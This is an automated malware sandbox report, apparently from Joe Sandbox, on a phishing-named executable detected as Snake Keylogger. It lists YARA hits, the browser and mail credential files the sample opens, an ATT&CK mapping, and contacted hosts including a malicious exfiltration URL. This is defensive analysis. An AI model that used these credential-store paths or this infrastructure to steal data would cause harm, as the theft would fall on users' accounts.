Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Users\user\Desktop\109__Purchase_Order.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\109__Purchase_Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.109__Purchase_Order.exe.442b100.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.444b920.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 109__Purchase_Order.exe PID: 7304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 109__Purchase_Order.exe PID: 7532, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
109__Purchase_Order.exe	39%	ReversingLabs	ByteCode-MSIL.Trojan.FormBook
109__Purchase_Order.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.tiro.com	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	Avira URL Cloud	safe
http://tempuri.org/DataSet1.xsd	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	Avira URL Cloud	safe
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/102.129.152.231	0%	Avira URL Cloud	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
http://www.zhongyicts.com.cn	0%	Avira URL Cloud	safe
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/102.129.152.231$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.225	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	unknown
scratchdreams.tk	104.21.27.85	true	false	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/102.129.152.231	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://us2.smtp.mailhostbox.com	109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/DataSet1.xsd	109__Purchase_Order.exe	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003140000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://scratchdreams.tk	109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003163000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	109__Purchase_Order.exe, 00000000.00000002.1692997195.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000000.00000002.1693165904.0000000007262000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/102.129.152.231$	109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003243000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003234000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003207000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000318E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.00000000031DE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://scratchdreams.tk	109__Purchase_Order.exe, 00000002.00000002.4075654635.0000000003251000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/	109__Purchase_Order.exe, 00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 109__Purchase_Order.exe, 00000002.00000002.4075654635.000000000314B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
208.91.199.225	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
104.21.27.85	scratchdreams.tk	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1419816
Start date and time:	2024-04-04 01:20:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	109__Purchase_Order.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 86 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 109__Purchase_Order.exe, PID 7532 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: 109__Purchase_Order.exe

Simulations

Behavior and APIs

Time	Type	Description
01:20:51	API Interceptor	11999254x Sleep call for process: 109__Purchase_Order.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.6.168	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PROFORMA FATURA.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	proforma_Invoice_0009300_74885959969_9876.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.2725.8730.30889.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.2725.27231.18654.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.2725.26841.22155.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Bztahpxu.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
208.91.199.225	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse
	FedEx_773099516146.exe	Get hash	malicious	AgentTesla	Browse
	FedEx_ 239071091.exe	Get hash	malicious	AgentTesla	Browse
	vJRoTmuNBS4S30j.exe	Get hash	malicious	AgentTesla	Browse
	IHf0UdzLac.exe	Get hash	malicious	AgentTesla	Browse
172.67.177.134	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse
	PROFORMA FATURA.exe	Get hash	malicious	Snake Keylogger	Browse
	xdd6BRIg0O.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse
	Halkbank_Ekstre_20240312_081829_752731.exe	Get hash	malicious	Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.6.168
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.130.0
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	158.101.44.242
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
scratchdreams.tk	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	ATM Dekont E-Maili pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.27.85
us2.smtp.mailhostbox.com	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	6P8VytD7wo.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
